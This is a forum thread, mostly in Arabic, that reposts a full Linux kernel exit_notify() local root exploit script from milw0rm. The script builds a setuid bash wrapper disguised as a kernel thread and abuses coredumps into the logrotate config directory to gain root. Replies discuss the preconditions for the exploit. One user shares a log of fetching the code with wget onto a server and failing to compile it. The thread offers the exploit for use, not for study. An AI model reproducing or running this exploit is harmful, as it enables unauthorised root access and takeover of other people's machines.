Linux kernel <2.6.29 exit_notify() local root exploit

[HACKERS PAL]

كود:

 #!/bin/sh

################################################################################
###
# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit**************
# 
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on &#39;exit_notify()&#39; CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 
# so you&#39;ll be out of luck most of the time. 
# So it is not going to be the script kiddies&#39; new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to 
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
################################################################################
####




SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that&#39;s good!"
else
echo "No logrotate installed, sorry!";exit
fi

echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include <unistd.h>
#include <sys/types.h>

int main()
{
****setuid(0);
****execl("/bin/bash","[kthreadd]",NULL);
}
EOF

cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c

echo -e "Compiling the exploit code..."

cat >> /tmp/exploit.c << EOF
#include <stdio.h>
#include <sched.h>
#include <signal.h>
#include <stdlib.h>
#include <unistd.h>

int child(void *data)
{
****sleep(2);
****printf("I&#39;m gonna kill the suidroot father without having root rights :D\n");
****execl("/usr/bin/gpasswd","%s",NULL);
****exit(0);
}

int main()
{
****int stacksize = 4*getpagesize();
****void *stack, *stacktop;
****stack = malloc(stacksize);
****stacktop = stack + stacksize;
****chdir("/etc/logrotate.d");
****int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
****if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF

cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c

echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex

if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you&#39;ll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi

echo "The system is not vulnerable, sorry :("

# milw0rm.com [2009-04-08]

المصدر
http://www.milw0rm.com/exploits/8369

[Alkindiii]

شكرا لك أخي HACKERS PAL

كإضافة لتطبيق هذا اللوكل روت يجب أن تكون قيمة /proc/sys/fs/suid_dumpable محددة في 1 أو 2.

وهذه القيمة لا يمكن تبديلها إذا لم يكن لديك روت وغالبا ما تكون هذه القيمة 0 (default value) يعني يجب أن يكون لديك بعض الحظ لتجدها غير ذلك في السيرفر وتطبق هذا اللوكل.

<div class='quotetop'>إقتباس</div>

Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0 so you'll be out of luck most of the time. So it is not going to be the script kiddies' new killer shit :-)[/b]

تحياتي.

[HACKERS PAL]

يعطيك العافية اخي على ردك وتوضيحك

لكن كمان في برامج وادوات عشان تتثبت على النظام بتتطلب انها هاد القيمة تكون 1 او 2

هي افتراضيا off .. لكن نسبة كبيرة من السيرفرات بتغيرها

سلام

[nightboss2007]

الله يفتح عليكم انتوا اثنين ويعطيكم العافيه

[!~¤§¦..M4ST3R..¦§¤~!]

ما نفع اللوكا روت معي مع ان اصدار الكرنل

كود:

2.6.9-42.0.10

يعني كما قلت اخي

<div class='quotetop'>إقتباس</div>

وكال رووت للكرنل 2.6.29 وما اقل[/b]

ملاحظه انا الي سويته اني نسخت الكود وحطيته بتكست وحفظته بامتداد c وضغتطه zip ورفعته برابط مباشر وسحبته على مجلد /tmp بس لما ترجمته اعطاني اخطاء للصبح



سلام

[!~¤§¦..M4ST3R..¦§¤~!]

وهذه الاخطاء

كود:

wget http://www.arbup.org/m1/amer1.zip
--01:55:18--**http://www.arbup.org/m1/amer1.zip
********** => `amer1.zip'
Resolving www.arbup.org... 66.96.133.24
Connecting to www.arbup.org|66.96.133.24|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,581 (1.5K) [application/zip]

****0K .

01:55:18 (57.99 MB/s) - `amer1.zip' saved [1581/1581]

unzip amer1.zip
Archive:**amer1.zip
replace amer.c? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
**inflating: amer.c
chmod 777 amer.c
gcc amer.c -o amer
amer.c:1:2: invalid preprocessing directive #!
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:3: error: syntax error at '##' token
amer.c:4: error: syntax error at '##' token
amer.c:4: error: syntax error at '#' token
amer.c:5:3: invalid preprocessing directive #gw
amer.c:7:3: invalid preprocessing directive #by
amer.c:9:3: invalid preprocessing directive #Based
amer.c:10:3: invalid preprocessing directive #Basically
amer.c:11:3: invalid preprocessing directive #parent
amer.c:12:3: invalid preprocessing directive #already
amer.c:13:3: invalid preprocessing directive #in
amer.c:15:3: invalid preprocessing directive #!
amer.c:16:3: invalid preprocessing directive #Needs
amer.c:17:3: invalid preprocessing directive #so
amer.c:18:3: invalid preprocessing directive #So
amer.c:19:3: invalid preprocessing directive #!
amer.c:21:10: missing binary operator before token "invent"
amer.c:105:27: warning: no newline at end of file
amer.c:21:1: unterminated #if

سلام

[Br4v3-H4cK3r]

شكرا لك اخي العزيز

في امان الله

[technico]

شكرا يا امرااااال
وجزاك الله خير

في امان الله

[naf-vb]

يعطيك العافية اخي على ردك وتوضيحك

[saidinho2000]

thanks a lott